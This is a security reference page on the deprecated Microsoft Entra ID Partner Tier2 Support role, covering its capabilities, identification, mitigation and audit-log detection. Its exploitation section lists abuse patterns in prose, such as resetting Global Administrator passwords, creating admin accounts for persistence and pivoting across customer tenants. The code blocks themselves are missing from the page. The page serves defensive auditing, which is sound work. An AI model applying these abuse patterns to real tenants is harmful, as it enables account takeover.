search
Ctrlk

AZ_PARTNER_TIER2_SUPPORT

WARNING: This role is deprecated. Microsoft states: "Do not use - not intended for general use." Organizations should transition to Granular Delegated Admin Privileges (GDAP).

hashtag
Summary

FSProtect ACL Alias

AZ_PARTNER_TIER2_SUPPORT

Entra ID (Azure AD) Alias

Partner Tier2 Support

Role Template ID

e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8

Affected Object Types

Users, Service Principals, Groups, Domains, Role Assignments

Exploitation Certainty

Certain

Graph Permission / Role

Membership in the Partner Tier2 Support directory role

hashtag
Description

AZ_PARTNER_TIER2_SUPPORT represents the Partner Tier2 Support directory role in Microsoft Entra ID. This role was assigned to Microsoft Partner organizations through the Cloud Solution Provider (CSP) or Delegated Admin Privileges (DAP) programs.

Capabilities of Partner Tier2 Support:

  • Reset passwords for ALL users including Global Administrators

  • Invalidate refresh tokens for all users including admins

  • Full domain management (create, delete, update domains)

  • Manage role assignments (create/delete role assignments)

  • Manage user accounts including creation, modification, and deletion

  • Manage groups and group memberships

  • Update applications and credentials

  • Create and manage OAuth permission grants

Partner Tier2 vs Tier1 Support:

Capability
Tier1
Tier2

Reset passwords for non-admins

Yes

Yes

Reset passwords for admins (including GA)

No

Yes

Domain management

No

Yes

Role assignment management

No

Yes

Security Implications:

This role is extremely dangerous because:

  • Password reset for Global Admins: One of very few roles that can reset GA passwords

  • External access: The role is held by principals from an external partner tenant

  • Nation-state abuse: NOBELIUM (APT29) abused DAP relationships to compromise multiple tenants

  • Cross-tenant trust: Actions are performed by entities outside your organizational control

  • Persistence: Partners may retain access even after business relationships end

  • Visibility gaps: Partner actions may not be as visible in customer audit logs

hashtag
Identification

hashtag
PowerShell (Microsoft Graph)

Find Partner Tier2 Support role assignments:

Check for all partner roles and GDAP relationships:

hashtag
Azure GUI

  1. Open Microsoft Entra admin center -> Roles & administrators

  2. Search for Partner Tier2 Support

  3. Check Assignments for any active members

  4. Also check Partner relationships:

    • Go to Microsoft 365 Admin Center -> Settings -> Partner relationships

    • Review all active partner access

hashtag
Exploitation

A compromised partner account with Tier2 Support can take over any account in the tenant, including Global Administrators.

Real-world abuse: In 2021, NOBELIUM (APT29/Cozy Bear) targeted MSP/CSP partners and abused DAP relationships to pivot into multiple customer tenants.

hashtag
PowerShell (Microsoft Graph)

Reset a Global Administrator's password:

Reset a Global Administrator's password

hashtag
Common Abuse Patterns

  • Reset Global Admin password and lock out legitimate administrators

  • Create new admin accounts for persistence

  • Modify OAuth app permissions for data exfiltration

  • Pivot from one compromised partner to multiple customer tenants

hashtag
Mitigation

  • Transition from DAP to GDAP: Migrate to Granular Delegated Admin Privileges for time-bound, least-privilege access

    • Go to Microsoft 365 Admin Center -> Settings -> Partner relationships

    • Set maximum duration (recommend 90 days or less)

  • Review partner relationships regularly:

    • Audit which partners have access to your tenant

    • Remove partner relationships no longer needed

    • Verify partner identity before approving GDAP requests

  • Never grant Partner Tier2 Support under GDAP:

    • Use least-privilege roles (Helpdesk Administrator, User Administrator)

    • Avoid granting password reset capability over admin accounts

  • Monitor partner actions:

    • Review audit logs for actions by partner accounts

    • Alert on password resets by external principals

    • Monitor cross-tenant sign-ins

  • Require MFA for partner access: Ensure partners use phishing-resistant MFA

hashtag
Detection

Detect partner access and actions in Audit logs.

hashtag
PowerShell (Microsoft Graph)

hashtag
Azure GUI

  • Go to Microsoft Entra ID -> Audit logs

  • Filter by:

    • Initiated by (actor): Look for external partner principals

    • Activity: Reset password, Update user, Add member to role

hashtag
Alert Criteria

  • Password resets by Partner Tier2 Support accounts

  • Password resets targeting administrator accounts

  • User modifications by external principals

  • New partner role assignments

  • Cross-tenant sign-ins during unusual hours

hashtag
References

  • https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference

  • https://learn.microsoft.com/en-us/partner-center/gdap-introduction

  • https://learn.microsoft.com/en-us/microsoft-365/commerce/manage-partners

  • https://www.microsoft.com/en-us/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

PreviousAZ_PARENT_AUNextAZ_PRIVILEGED_AUTH_ADMIN

Last updated

Was this helpful?